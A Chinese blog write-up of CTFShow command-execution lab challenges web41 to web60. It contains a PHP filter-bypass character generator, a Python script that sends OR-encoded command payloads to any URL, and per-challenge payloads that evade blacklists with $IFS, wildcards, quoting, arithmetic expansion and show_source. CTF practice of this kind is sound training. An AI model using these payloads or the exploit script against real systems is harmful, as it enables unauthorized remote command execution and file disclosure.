用CTFShow例题练习命令执行web41-web60

最新推荐文章于 2024-06-08 17:41:26 发布
最新推荐文章于 2024-06-08 17:41:26 发布
阅读量3.1k 收藏 3
点赞数 3
文章标签: 字符过滤 正则绕过 函数禁用 字符串操作 CTF解题策略
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54502707/article/details/122775463
版权

Hello~大家好,这里是KOKO!

之前对CTFShow的命令执行类部分题目做了记录,今天我们继续做后续的题目:

简单绕过

web41

avatar

我们看一下源代码:

avatar

通过源代码我们可以发现,屏蔽了数字和字母,还屏蔽了一些其他的特殊字符。屏蔽的比较多,我们可以跑脚本来生成可用字符的集合
思路是:
所有字符(ASCII[0-255])中排除掉被过滤的,然后再判断或运算得到的字符是否为可见字符。

我们先用脚本生成可用字符的集合

<?php
/*
# -*- coding: utf-8 -*-
# @Author: Y4tacker
# @Date:   2020-11-21 20:31:22
*/
//或
function orRce($par1, $par2){
    $result = (urldecode($par1)|urldecode($par2));
    return $result;
}

//异或
function xorRce($par1, $par2){
    $result = (urldecode($par1)^urldecode($par2));
    return $result;
}

//取反
function negateRce(){
    fwrite(STDOUT,'[+]your function: ');

    $system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));

    fwrite(STDOUT,'[+]your command: ');

    $command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));

    echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
}

//mode=1代表或,2代表异或,3代表取反
//取反的话,就没必要生成字符去跑了,因为本来就是不可见字符,直接绕过正则表达式
function generate($mode, $preg='/[0-9]/i'){
    if ($mode!=3){
        $myfile = fopen("rce.txt", "w");
        $contents = "";

        for ($i=0;$i<256;$i++){
            for ($j=0;$j<256;$j++){
                if ($i<16){
                    $hex_i = '0'.dechex($i);
                }else{
                    $hex_i = dechex($i);
                }
                if ($j<16){
                    $hex_j = '0'.dechex($j);
                }else{
                    $hex_j = dechex($j);
                }
                if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){
                    echo "";
                }else{
                    $par1 = "%".$hex_i;
                    $par2 = '%'.$hex_j;
                    $res = '';
                    if ($mode==1){
                        $res = orRce($par1, $par2);
                    }else if ($mode==2){
                        $res = xorRce($par1, $par2);
                    }

                    if (ord($res)>=32&ord($res)<=126){
                        $contents=$contents.$res." ".$par1." ".$par2."\n";
                    }
                }
            }

        }
        fwrite($myfile,$contents);
        fclose($myfile);
    }else{
        negateRce();
    }
}
generate(1,'/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i');
//1代表模式,后面的是过滤规则

我们通过源码可以发现,没有过滤或运算|,因此脚本中设置的mode为1,也就是或运算,运行此脚本。

接下来我们再利用羽师傅的脚本:

# -*- coding: utf-8 -*-
import requests
import urllib
from sys import *
import os

os.system("php D:\\phpstudy_pro\\WWW\\rce_fuzz.php")  # 没有将php写入环境变量需手动运行
if (len(argv) != 2):
	print("=" * 50)
	print('USER:python exp.py <url>')
	print("eg:  python exp.py http://ctf.show/")
	print("=" * 50)
	exit(0)
url = argv[1]


def action(arg):
	s1 = ""
	s2 = ""
	for i in arg:
		f = open(r"D:\phpstudy_pro\WWW\rce.txt", "r")//填txt的文件位置
		while True:
			t = f.readline()
			if t == "":
				break
			if t[0] == i:
				# print(i)
				s1 += t[2:5]
				s2 += t[6:9]
				break
		f.close()
	output = "(\"" + s1 + "\"|\"" + s2 + "\")"
	return (output)


while True:
	param = action(input("\n[+] your function:")) + action(input("[+] your command:"))
	data = {
		'c': urllib.parse.unquote(param)
	}
	r = requests.post(url, data=data)
	print("\n[*] result:\n" + r.text)

注意更改php脚本的位置和生成的rce.txt的位置,还有接受的参数比如上面是c,换个参数就把c改了就行,再配置一下php的环境变量即可。
完整流程为:

先改一下php脚本中generate函数里的参数,也就是设置模式和正则
python rce_.py url

另外,也可以在bp里发送,去掉分号,即可得到flag:

avatar

先进行重定向,再绕过

web42

avatar

继续进行过滤绕过。
打开环境:

avatar

> 代表重定向到哪里
/dev/null 代表空设备文件
2> 表示stderr标准错误
& 表示等同于的意思,2>&1,表示2的输出重定向等同于1
1 表示stdout标准输出,系统默认值是1,所以>/dev/null等同于 1>/dev/null
因此,>/dev/null 2>&1 也可以写成1> /dev/null 2> &1

本题语句执行过程为:
1>/dev/null :首先表示标准输出重定向到空设备文件,也就是不输出任何信息到终端,不显示任何信息。
2>&1 : 接着,标准错误输出重定向到标准输出,因为之前标准输出已经重定向到了空设备文件,所以标准错误输出也重定向到空设备文件。

补充:
0表示键盘输入,1表示屏幕输出,2表示错误输出!
‘ > ’ 默认标准输出重定向,与1>相同
2>&1 意思是把标准错误输出重定向到标准输出
&>file 意思是把标准输出和标准错误输出都重定向到文件file中

而我们想要得到输出可以加上截断语句:

?c=cat flag.php%0a
?c=cat flag.php||
?c=cat flag.php%26
?c=cat flag.php%26%26
?c=cat flag.php;

然后查看源代码即可得到flag:

avatar

web43

avatar

打开环境:

avatar

这次还过滤了cat;,因此我们可以用nl来绕过:

?c=nl flag.php%0a

然后再查看源码,即可得到flag:
avatar

web44

avatar

打开环境后分析代码:

avatar

这次又过滤了flag字符串,我们可以用*补位从而绕过:

?c=nl fla*.php%0a

查看源码,即可得到flag:
avatar

web45

avatar

我们打开环境后对代码进行分析:

avatar

本题的过滤条件:;catflag空格

我们可以用$IFS来绕过空格:

?c=echo$IFS`tac$IFS*`%0A

该语句不需要查看源码即可得到flag:
avatar

web46

avatar

我们可以看到代码:

avatar

过滤条件: catflag空格数字$*
绕过空格现在不能用$IFS绕过,但是可以用<>%09绕过(注意<和?不能连用,而%09不被过滤是因为上传到服务器就是tab键,不算数字)

因此payload为:

?c=nl<fla''g.php||

查看源码即可得到flag:
avatar

web47

avatar

分析代码:

avatar

过滤条件:分号flag空格数字$*morelessheadsorttail

绕过了,但是又好像没绕,上一题的payload也适用于这题:

?c=nl<fla''g.php||

查看源码即可得到flag:
avatar

web48

avatar

分析代码:

avatar
本题的绕过,使用上题的payload即可:

?c=nl<fla''g.php||

查看源码即可得到flag:
avatar

web49

![avatar][base64str25]

分析代码:
![avatar][base64str26]
本题的绕过,同样使用上题的payload即可:

?c=nl<fla''g.php||

查看源码即可得到flag:
![avatar][base64str27]

web50

![avatar][base64str28]

分析代码:

![avatar][base64str29]

过滤条件:分号catflag空格数字$*morelessheadsorttailsedcutawkstringsodcurl%%09&(编码后为%26)和/`

本题的绕过,同样使用上题的payload即可:

?c=nl<fla''g.php||

查看源码即可得到flag:
![avatar][base64str30]

web51

![avatar][base64str31]

分析代码:

![avatar][base64str32]
本题的绕过,同样使用上题的payload即可:

?c=nl<fla''g.php||

查看源码即可得到flag:
![avatar][base64str33]

web52

![avatar][base64str34]

分析代码:

![avatar][base64str35]

这次多过滤了空格,因此我们将上题的payload中的空格,用&IFS替换即可绕过:

?c=nl$IFS/fla''g||

即可得到flag:
![avatar][base64str36]

web53

![avatar][base64str37]

分析代码:

![avatar][base64str38]

本题如果还用上题的payload发现无法成功得到flag,那我们将cat语句进行加工后实现:

?c=c''at${IFS}fla''g.p''hp

即可得到flag:
![avatar][base64str39]

web54

![avatar][base64str40]

分析代码:

![avatar][base64str41]

加强了正则,不能用*代替,构造payload:

?c=/bin/?at${IFS}f???????

查看源码,即可得到flag:

![avatar][base64str42]

web55

![avatar][base64str43]

分析代码:
![avatar][base64str44]

我们可以构造payload:

?c=/???/????64 ????????%0a

传参后会出现一大串编码,进行base64解码即可得到flag:
![avatar][base64str45]

web56

![avatar][base64str46]

分析代码:
![avatar][base64str47]

这次将字母数字都过滤了。
因为只有PHP生成的临时文件包含大写字母,所以可以用/???/????????[@-[]来匹配我们上传的临时文件。

原理:
翻开ASCII码表,可见大写字母位于@[之间,那么,我们可以利用[@-[]来表示大写字母。并且我们用. 执行文件不需要x权限,由此我们可以构造出上述的payload。

因此抓包后修改数据包即可得到flag:
![avatar][base64str48]

web57

![avatar][base64str49]

分析代码:

![avatar][base64str50]

提示告诉我们flag在36.php里,但是却把数字过滤了。
我们需要想办法构造出36
$(()) :代表做一次运算,因为里面为空,也表示值为0
$ ((~ $ (()))) :对0作取反运算,值为-1
$ (( $ ((~ $ (()))) $ ((~ $ (()))))): -1-1,也就是(-1)+(-1)为-2,所以值为-2
$ ((~ $ (( $ ((~ $ (()))) $ ((~ $ (()))))))) :再对-2做一次取反得到1,所以值为1
故我们在$(())里面放37个$((~$(()))),得到-37,取反即可得到36:

?c=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))

查看源码即可得到flag:
![avatar][base64str51]

突破禁用函数

web58

![avatar][base64str52]

分析代码:
![avatar][base64str53]

由题目可知,本题有设置禁用函数,但根据代码我们还不清楚禁用了哪些函数,因此我们先随便用一个函数访问试一下:system()
system() has been disabled for security reasons说明php.ini配置中默认禁用了执行系统外部命令函数,我们可以用php内置函数来读取文件。
本题我们使用show_source()函数:

POST: c=show_source("flag.php");

传参后即可得到flag:
![avatar][base64str54]

web59

![avatar][base64str55]

分析代码:
![avatar][base64str56]

与上题一样,用show_source函数即可得到flag:

POST:c=show_source('flag.php');

![avatar][base64str57]

web60

![avatar][base64str58]

分析代码:
![avatar][base64str59]

与上题一样,用show_source函数即可得到flag:

POST:c=show_source('flag.php');

![avatar][base64str60]

Koko~
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFshow 命令执行 web60
Kradress的博客
12-03 182
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在炫技吗? if(isset($_POST
ctfshow-web命令执行(web45-60)
m0_50268414的博客
11-29 2595
文章目录web45 &&等于; tab等于spaceweb46 过滤数字\*\$web47 <等于空格 ||解决黑洞web48 没什么软用web49 仍然没什么软用web50 过滤了%09%26web51 过滤了tacweb52 过滤了>和<web53 添加了回显web54 丧心病狂不让用''绕过web55 过滤了所有字母web56 过滤了所有字母2web57 \$(())web58 无回显web59 无回显2web60 无回显3 web45 &&等于; t
ctfshow-web入门-命令执行web41_exp与分析)
最新发布
Welcome To Myon'Blog !
06-08 676
preg 是题目的正则匹配规则,在 ASCII 可见字符范围内,先排除掉正则表达式匹配的字符,将其他可用的字符进行按位或运算,再将运算得到的可见字符,以及参与或运算结果为可见字符的组合转为 16 进制拼接 % 后写入 txt 文件。过滤掉了数字、字母以及一些符号,之前接触过的无字母 rce 是取反编码再取反,采用不可见字符去绕过正则,但是这里取反符号被过滤掉了,但是注意到或符号被放出来了,下面附上这种类型题目的相关脚本,并给出一定解释。(2)php 可用字符生成脚本(这个的生成方式可以选择或和异或操作)
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
Jay17的博客
08-16 3208
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
《CTFshow-Web入门》06. Web 51~60
学习学习学习......
04-23 825
system() 利用与正则绕过,{>/dev/null 2>&1} 绕过、post 请求之 eval() 利用与正则绕过。
ctfshow web入门 命令执行web59-63
m0_62207170的博客
04-07 152
ctfshow web入门命令执行web59-63
1+X Web前端开发例题 实操题2
04-30
内容为1+X Web前端开发例题 题目类型为实操题 包含11题(与我的其他资源有一二重复例题) 内容不含答案解析(答案可以来我的博客找喔,有题目分析 https://blog.csdn.net/weixin_53231455?spm=1011.2124.3001.5343 题目...
1+X Web前端开发例题 实操题1
03-30
内容为1+X Web前端开发例题 实操题6题 内容不含答案解析(答案可以来我的博客找喔,有题目分析 https://blog.csdn.net/weixin_53231455?spm=1019.2139.3001.5343 题目类型都是前端的知识点
C++经典练习例题200例.zip_-baijiahao_C++_C++习题下载_C++例题_C++题目
07-15
C++习题200题,都是简单题目,可以用来练习
CTF web安全经典例题讲解
10-22
本主题集中于CTF赛题中的Web安全部分,通过一系列经典例题来帮助初学者理解和掌握核心技能。以下是根据标题、描述和标签提炼出的相关知识点: 1. **SQL注入**:SQL注入是Web应用中常见的安全漏洞,攻击者通过输入...
2 - Using Widgets Exercise Materials_ReactiveWeb_OutSystems_widg
10-04
在OutSystems平台上,"Reactive Web"是一种先进的技术框架,专为构建响应式、高性能的Web应用程序而设计。本训练材料主要围绕“Using Widgets Exercise”展开,旨在帮助开发者深入理解和熟练掌握OutSystems中的...
Web】CTFSHOW 常用姿势刷题记录(全)
uuzeray的博客
02-25 1765
通过将常用的函数、类和数据打包成.so 文件,不同的程序可以共享这些代码,避免重复编写和维护相同的代码逻辑,提高了代码的重用性。
[ctfshow web入门]常用姿势801-806
weixin_45751765的博客
04-14 4310
php单引号和双引号包裹的区别
CTFshow web56 57 58 59 60-65
ChenD的学习笔记
11-12 914
CTFshow web56 web57 web58 web59 web60 web61 web62 web63 web64 web65
ctfshow web(不定期更新)
pakho_C的博客
09-23 2669
php://input 可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php://input将会无效。MD5弱等于绕过:有些字符md5后的值为0e开头,会被当做科学计数法,也就是0.所以当找到2个字符md5后的值都为0e开头时即可绕过。绕过方法:如果是以数字开头的字符串,使用is_numeric的时候会自动去掉后面的字符,将其前面的数字取出来判断。web3的升级,过滤了php伪协议,使用日志注入。
CTFshow 命令执行 web41
Kradress的博客
11-14 3654
文章目录源码前言解题总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: 羽 # @Date: 2020-09-05 20:31:22 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 22:40:07 # @email: 1341963450@qq.com # @link: https://ctf.show */ if(isset($_POST['c'])){
ctfshow-web入门——命令执行(2)(web41-web57)
m0_62905745的博客
03-16 1039
本篇文章是ctfshow的web入门部分的命令执行部分wp(web41-web 57),包括一些题目解答,自己的笔记和总结,有错误还希望大家指正,一起学习进步!
ctfshow中web入门第web41
XXokok的博客
12-24 683
ctfshow41关解法,提供异或、或预算绕过的利用代码
CTFshow web入门 web41~web55 命令执行
qq_56815564的博客
04-15 1413
这回是真正意义上的禁用了这些命令了,以前还能通过中间添加一些特殊符号来绕过的,现在是完全不能使用了,毕竟 . 后面跟上一个通配符后,就完全不能在中间加点什么了。简单分析一下,if中的语句第一个是输出GET传入的参数、第二个是执行c的语句后得到的东西赋值给d、第三个是换行后在输出d的内容。但是留下了一个一个或运算符( | )空格不能用可以使用tab键代替,url编码是%09,反正tab是最多是4个空格,多几个空格也不会怎样。说到底,这么多能有回显的函数,也不差cat这一个,形式有这么多,也不差分号这一个。
回溯法经典例题--任务分配问题--C语言
11-04
任务分配问题是一种经典的组合优化问题,它的目标是将n个任务分配给n个人,使得总的分配成本最小。回溯法是解决任务分配问题的一种常用方法。具体来说,回溯法通过枚举所有可能的任务分配方案,并逐步剪枝,最终找到最优解。在C语言中,可以通过递归实现回溯法。下面是任务分配问题的C语言代码实现: ```c #include <stdio.h> #define N 4 int min_cost = 1000000; // 初始化最小成本为一个较大的数 int cost[N][N] = {{9, 2, 7, 8}, {6, 4, 3, 7}, {5, 8, 1, 8}, {7, 6, 9, 4}}; // 任务分配成本矩阵 void assign(int i, int sum, int used[]) { if (i == N) { // 所有任务都已分配完毕 if (sum < min_cost) { // 更新最小成本 min_cost = sum; } return; } for (int j = 0; j < N; j++) { if (!used[j]) { // 第j个人还未被分配任务 used[j] = 1; // 标记第j个人已被分配任务 assign(i+1, sum+cost[i][j], used); // 递归分配下一个任务 used[j] = 0; // 回溯,撤销第j个人的任务分配 } } } int main() { int used[N] = {0}; // 初始化所有人都未被分配任务 assign(0, 0, used); // 从第0个任务开始分配 printf("最小成本为:%d\n", min_cost); return 0; } ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值